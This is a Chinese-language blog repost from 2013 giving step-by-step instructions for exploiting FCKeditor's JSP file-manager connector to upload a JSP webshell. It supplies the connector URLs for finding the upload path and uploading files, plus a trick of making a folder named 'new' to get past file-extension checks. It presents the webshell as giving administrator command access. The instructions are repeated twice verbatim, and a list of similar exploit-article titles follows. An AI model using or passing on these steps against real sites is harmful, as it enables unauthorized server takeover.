fckeditor jsp 漏洞利用
2013-03-31 01:05
267 查看
Fckeditor jsp版漏洞利用方法:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图
注意红框的地方,是上传后图片存放的地址。
然后用
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
这个地址上传jsp文件,如果网站对上传文件的后缀作了限制,那么就新建一个名字为new的文件夹,修改上面url中的Type=Image为Type=new,把文件上传到这个文件夹,这个文件夹一般就不会对文件后缀作限制了。如图:
如果一切正常的话,利用这个Fckeditor 的漏洞所获得的jsp webshell应该有cmd管理员权限。
转载:http://hi.baidu.com/tbjmnvbagkfgike/item/56aa4a351d8aedb8633affb0
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图
注意红框的地方,是上传后图片存放的地址。
然后用
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
这个地址上传jsp文件,如果网站对上传文件的后缀作了限制,那么就新建一个名字为new的文件夹,修改上面url中的Type=Image为Type=new,把文件上传到这个文件夹,这个文件夹一般就不会对文件后缀作限制了。如图:
如果一切正常的话,利用这个Fckeditor 的漏洞所获得的jsp webshell应该有cmd管理员权限。
转载:http://hi.baidu.com/tbjmnvbagkfgike/item/56aa4a351d8aedb8633affb0
相关文章推荐
- Fckeditor jsp版漏洞利用方法:
- 利用编辑器漏洞ewebeditor-fckeditor-southidceditor
- fckeditor asp 漏洞利用
- FCKeditor(FCK)上传漏洞利用原理详解
- Fckeditor漏洞利用总结
- Fckeditor常见漏洞的挖掘与利用整理汇总
- Fckeditor漏洞利用总结
- FCKeditor漏洞利用
- 分享一些关于Fckeditor漏洞利用总结
- php+apache fckeditor漏洞利用
- Fckeditor漏洞之利用解析漏洞
- Fckeditor漏洞利用方法总结
- fckeditor php 漏洞利用
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
- Fckeditor漏洞利用全面解析
- Fckeditor漏洞利用方法总结
- Fckeditor漏洞利用总结
- Fckeditor漏洞利用总结
- FCKeditor漏洞所有利用页面
- Fckeditor常见漏洞的挖掘与利用整理汇总